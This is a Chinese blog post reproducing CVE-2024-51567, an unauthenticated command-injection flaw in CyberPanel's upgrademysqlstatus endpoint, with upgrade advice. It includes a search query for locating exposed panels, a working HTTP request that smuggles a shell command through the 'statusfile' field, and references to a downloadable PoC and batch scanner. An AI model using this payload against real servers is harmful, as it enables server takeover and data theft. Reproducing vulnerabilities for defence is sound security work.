【漏洞复现】CVE-2024-51567 CyberPanel upgrademysqlstatus 远程命令执行

Ly4j

已于 2024-12-20 12:44:24 修改

阅读量1.3k

点赞数 2

分类专栏：漏洞复现文章标签： CVE-2024-51567

于 2024-10-31 11:53:51 首次发布

本文链接：https://blog.csdn.net/qq_44159028/article/details/143391642

版权

漏洞复现专栏收录该内容

48 篇文章

订阅专栏

该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤，未授权的攻击者可以通过此接口执行任意命令获取服务器权限，从而造成数据泄露、服务器被接管等严重的后果。

影响版本

CyberPanel v2.3.5
CyberPanel v2.3.6

目前官方已有可更新版本，建议受影响用户升级至最新版本：CyberPanel >= v2.3.7

漏洞复现

app="CyberPanel"

OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/json
Connection: close
 
{"statusfile":"/dev/null; id; #"}

漏洞利用poc

CVE-2024-51567.py url 命令

漏洞批量检测poc

url需要放在当前路径url.txt文件中，使用线程池并发请求。直接执行脚本即可。代码已上传：https://download.csdn.net/download/qq_44159028/89938884?spm=1001.2014.3001.5501

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Ly4j

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

CyberPanel upgrademysqlstatus 远程命令执行漏洞(QVD-2024-44346)

0xSec

10-28

1553

该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤，未授权的攻击者可以通过此接口执行任意命令获取服务器权限，从而造成数据泄露、服务器被接管等严重的后果。目前该漏洞技术细节与EXP已在互联网上公开，鉴于该漏洞影响范围较大，建议用户尽快做好自查及防护。

MySQL服务器存在远程安全漏洞

SrySmalltalk的博客

10-06

593

总之，保护MySQL服务器免受远程安全漏洞的最佳方法是采取多种安全措施，包括及时更新、配置访问控制、使用防火墙、定期备份和监控日志。通过综合应用这些方法，可以提高服务器的安全性，减少潜在攻击的风险，保护数据库中的敏感信息。在示例中，'new_user’是新用户的用户名，'localhost’表示只允许本地访问，'password’是用户的密码，'database_name’是要授权的数据库名称。根据实际情况进行修改。这个漏洞的具体细节是未知的，但可以采取一些措施来提高服务器的安全性，并减轻潜在的攻击风险。

参与评论您还未登录，请先登录后发表或查看评论

Goby 漏洞发布｜CVE-2024-8353：WordPress GiveWP 插件 /admin-ajax.php 命令执行漏洞

m0_46699477的博客

10-11

593

GiveWP 是一个非常受欢迎的 WordPress 插件，专门用于非营利组织和个人接受在线捐款。 WordPress中的GiveWP捐款插件和募款平台插件存在PHP对象注入漏洞，影响所有版本至包括（含）3.16.1版本。该漏洞通过反序列化不可信输入的几个参数（如'give_title'和'card_address'）产生。这使得未经身份验证的攻击者可以注入PHP对象

CVE-2024-6387环境搭建和复现

最新发布

dzqxwzoe的博客

03-02

721

这本质上是一种统计漏洞：需要进行大量尝试才能赢得竞争条件并成功执行任意代码，攻击者需要克服很多障碍，”Schwartz 告诉SecurityWeek。“即使在最好的情况下，最著名的漏洞也需要 4 个多小时才能运行。在OpenSSH 9.8 的发布说明中，开发人员指出该漏洞仅在基于 glibc 的 32 位 Linux 系统上得到证实，并指出 OpenBSD 不受影响。环境搭建采用Docker公网有了一个，但是需要编译，代码附在相关链接里了。我改成了python的，增加了多线程并发，提高攻击速度。

漏洞分析｜CyberPanel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

不忘初心，护天下安全！

11-03

146

它具有网站管理（便捷建站、SSL 设置）、数据库管理（可视化操作、备份恢复）、用户与权限管理（创建不同权限用户及经销商用户）等功能，还有邮件、FTP 服务及安全工具集成等，有免费版和企业版，适用于多种用户，操作界面简洁，性能出色。该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤，使得未授权的攻击者能够通过此接口执行任意命令，进而获取服务器权限，可能造成数据泄露、服务器被接管等严重后果。服务1: 加入东方隐侠安全团队知识大陆，即可获取最新网络安全学习资料，伴您更好成长更快进步。

【漏洞复现】CyberPanel远程命令执行漏洞

m0_46381222的博客

11-01

816

【漏洞复现】CyberPanel远程命令执行漏洞

零基础入门网络安全(1)

2301_77121488的博客

04-27

975

在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。Python所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

CVE-2024-51567 CyberPanel upgrademysqlstatus 远程命令执行批量检测poc

10-31

CVE-2024-51567是一个信息安全领域的特定漏洞编号，它关联于CyberPanel这一管理面板的特定版本。CyberPanel是一个为Web主机服务提供管理功能的软件，提供了控制面板、文件管理、数据库管理等一系列服务。...

CVE-2024-51567 CyberPanel upgrademysqlstatus 远程命令执行poc

10-31

在本例中，CVE-2024-51567的存在，意味着upgrademysqlstatus功能中可能有一个输入验证不当的问题，或者权限设置不当的问题，导致了可以被远程利用的命令注入漏洞。由于具体的漏洞细节未在给定的文件信息中详细描述，...

CVE-2024-38819：Spring 框架路径遍历 PoC 漏洞复现

12-16

如果路径遍历与其他漏洞（比如远程代码执行漏洞）结合，那么其危害将更加巨大。针对CVE-2024-38819漏洞，研究人员提供了一个概念验证（Proof of Concept，简称PoC）的代码示例，即CVE-2024-38819-POC-main。PoC...

exploit （Linux 内核CVE-2024-1086漏洞复现脚本）

06-06

Linux 内核CVE-2024-1086漏洞复现脚本。在普通用户下，将文件上传后，chmod 777 exploit ，然后运行 ./exploit ，提权成功，输入id，可看到已经是root权限。

CVE-2024-53677

12-17

CVE-2024-53677 – 关键的 Apache Struts 远程代码执行漏洞已在流行的 Apache Struts 框架中发现了一个严重漏洞 CVE-2024-53677，该漏洞可能允许攻击者远程执行任意代码。该漏洞是由文件上传逻辑中的缺陷引起的，...

CVE-2024-21006-weblogic远程命令执行漏洞

zwy15288408160的博客

04-25

6696

Oracle WebLogic Server 存在远程命令执行漏洞（CVE-2024-21006）,该漏洞源于T3/IIOP协议存在缺陷，未经身份验证的攻击者可通过T3/IIOP协议受影响的服务器发送恶意的请求，利用LDAP工具执行任意代码。

CVE-2024-38077：Windows远程桌面授权服务的‘隐形杀手’——深度剖析与紧急防护策略

超哥的博客

08-12

2550

CVE-2024-38077：Windows远程桌面授权服务的‘隐形杀手’——深度剖析与紧急防护策略1 漏洞描述2 漏洞影响2.1 处置优先级：高2.2 影响版本3 漏洞检测3.1 漏洞检测工具3.2

『CVE』简析CVE-2024-48795 SSH协议前缀截断攻击(Terrapin攻击)

04-15

1058

最近很多小伙伴找我要Linux学习资料，于是我翻箱倒柜，整理了一些优质资源，涵盖视频、电子书、PPT等共享给大家！

CVE-2024-38077 Windows远程桌面授权服务漏洞介绍

轻舟已过万重山

08-14

1606

漏洞编号漏洞类型：远程代码执行 (RCE)影响范围：Windows远程桌面授权服务危害程度：极高发现时间：2024年8月初。

『CVE』简析CVE-2024-48795 SSH协议前缀截断攻击(Terrapin攻击)(1)

2401_84185556的博客

04-10

785

盖了95%以上网络安全知识点，真正体系化！**

CVE-2024-0569复现及IDS snort防御

2401_82670286的博客

01-29

720

发现了一个被归类为有问题的漏洞，该漏洞存在于Totolink T8 4.1.5cu.833_20220905版本中。该漏洞影响了文件/cgi-bin/cstecgi.cgi中Setting Handler组件的getSysStatusCfg功能。对参数ssid/key的操纵导致信息泄露。攻击者可以远程发起攻击。该漏洞已经公开披露并可能被滥用。升级到版本4.1.5cu.862_B20230228可以解决此问题。建议升级受影响的组件。该漏洞被分配了识别号VDB-250785。

靶向安全研究的利器：CVE-2024-27804 开源项目详解

gitblog_00091的博客

06-23

679

靶向安全研究的利器：CVE-2024-27804 开源项目详解去发现同类优质开源项目:https://gitcode.com/ 项目介绍 CVE-2024-27804 是一个针对特定操作系统（如 Darwin Kernel Version 23.2.0）的严重安全漏洞。这个开源项目提供了一个工具集，用于复现和分析该漏洞，帮助研究人员深入理解其工作原理，并为系统安全性改进提供依据。通过运行 ./b...